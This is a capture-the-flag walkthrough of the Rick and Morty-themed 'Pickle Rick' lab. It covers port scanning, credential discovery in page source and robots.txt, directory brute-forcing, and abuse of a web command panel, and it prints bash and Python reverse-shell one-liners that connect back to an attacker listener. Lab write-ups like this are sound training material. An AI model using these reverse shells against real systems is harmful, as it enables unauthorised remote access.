Pickle Rick

A Rick and Morty CTF. Help turn Rick back into a human!

This Rick and Morty-themed challenge requires you to exploit a web server and find three ingredients to help Rick make his potion and transform himself back into a human from a pickle.

You have to answer three questions (flag) to fully complete this room:

1. What is the first ingredient that Rick needs?

2. What is the second ingredient in Rick’s potion?

3. What is the last and final ingredient?

Enumeration

$ nmap -sV -sC <IP>

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 21:d4:44:b1:43:e3:a2:ca:51:b6:2f:dd:5a:ff:45:98 (RSA)
|   256 51:57:da:91:fd:9c:38:ec:24:b2:21:d7:f5:e0:cf:69 (ECDSA)
|_  256 68:dc:d7:0b:94:e6:c4:d1:62:ca:8b:a1:c2:d1:e9:6d (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Rick is sup4r cool
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Let's check port 80 on our browser.

Main page when visiting IP on port 80

Let's check the source code of the page for anything left behind.

Source code for the page

We've found Rick's username...now we need a password. Let's check for /robots.txt file and see what we found

Wubbalubbadubdub

This could be a password. Let's try login via SSH with this combination:

Username: R1ckRul3s
Password: Wubbalubbadubdub

However, when attempting to access via SSH, we receive the following error:

$ ssh R1ckRul3s@<IP>
R1ckRul3s@<IP>: Permission denied (publickey).

It means we will find another place to use these credentials. Let's use gobuster to search for someting, maybe a login page.

gobuster dir -w /home/kali/Documents/Hacking_stuff/SecLists/Discovery/Web-Content/combined_words.txt -u <IP>

===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200)
/robots.txt           (Status: 200)
/.                    (Status: 200) 

gobuster dir -w /home/kali/Documents/Hacking_stuff/SecLists/Discovery/Web-Content/Logins.fuzz.txt -u <IP>  
===============================================================
/login.php            (Status: 200) 
/?page=admin.auth.inc (Status: 200) 
/?page=auth.inc.php   (Status: 200) 
/?page=auth.inc       (Status: 200) 
===============================================================

Let's try opening this page to see if the credentials found are correct

From here, we find a control panel that allows us to execute commands directly on the system.

Foothold

We can try to print the content of clue.txt or Sup3rS3cretPickl3Ingred.txt. However, trying to execute a cat will show us the following screen.

At this point, let's try to directly obtain a reverse shell. None of the following methods seem to work.

/bin/bash -c 'bash -i>&/dev/tcp/<myIP>/<myPORT> 0>&1';
echo "<PayloadBASE64>" | base64 -d | sh

After checking for Python3 on the device, let's try the following method:

python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("<IP>",<Port>));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("bash")'

Listener sulla macchina locale e ottenimento reverse shell

Privilege escalation

Check the current user's privileges using the command

Verifica dei privilegi e ottenimento root

We have successfully gained root privileges. Now, by searching under /home, we will find Rick's folder containing the second ingredient inside the file second ingredients. Under /root, we will find the third and final ingredient, contained in the file

We've finally pwned this machine🥒🚩